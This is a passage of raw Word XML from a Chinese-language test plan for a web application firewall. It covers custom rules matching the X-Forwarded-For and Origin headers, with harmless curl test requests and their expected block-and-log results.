              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5100ED">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>除了可以匹配特定IP，还支持阻断来自特定地域的请求，国内精确到省，国外精确到国家。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1BA7AD78">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="16F271DD">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6E06F310">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70647A83">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0AB6836D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16DCB43B">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BFB07C9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58668761">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59BCF178">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4088686D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc21077826"/>
      <w:bookmarkStart w:id="160" w:name="_Toc81916130"/>
      <w:bookmarkStart w:id="161" w:name="_Toc1440377099"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X-Forwarded-For匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
      <w:bookmarkEnd w:id="16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0313EFFE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4C1B03A6">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="4367E048">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义X-Forwarded-For匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5745F872">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2EEAA1D7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7A4F8248">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配X-Forwarded-For规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="694A862D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="325903A8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="1BEE207F">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19616129">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47D91E23">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点X-</w:t>
            </w:r>
            <w:r>
              <w:t>Forwarded-For</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段中包含</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">40.73.32.238 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F66000D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>curl -vv http://www.site.com/XFF.html -H “X-Forwarded-For: 40.73.32.238”;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="371CDCAC">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203A20AC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6B0A686D">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="09551603">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="27E3EFF7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="71042712">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="475BCD68">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AAD1AED">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6E79A0C2">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B191E00">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DA0B2A7">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38F2838A">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DEECF1C">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D8C5D47">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc21077827"/>
      <w:bookmarkStart w:id="163" w:name="_Toc81916131"/>
      <w:bookmarkStart w:id="164" w:name="_Toc1982233909"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Origin匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="164"/>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155AA57">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0CE37398">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="0CD63902">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>自定义Origin匹配规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E0CF838">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E749051">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="78D13C8D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加匹配Origin规则来检测流量是否匹配并进行日志记录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5DAA4F6D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="229B2DB9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="3635E095">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF58DD1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="264E7507">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在「网站防护」-「自定义规则」-「全局自定义规则」中点击「添加规则」，当用户浏览防护站点</w:t>
            </w:r>
            <w:r>
              <w:t>Origin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段中不包含</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">www.site.com </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>时进行拦截；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AEC48D0">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>curl -vv http://www.site.com/ -H “Origin: www.chaitin.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45B2210A">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79C500E6">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="69B5FDC9">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="05D5E529">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功匹配自定义规则，拦截流量并记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5EF91B6A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="15C081CD">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15404DE6">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FF8222C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="159D8774">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57622DBA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C812870">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31F931CC">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D43BB44">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A73EBE8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc21077828"/>
      <w:bookmarkStart w:id="166" w:name="_Toc81916132"/>
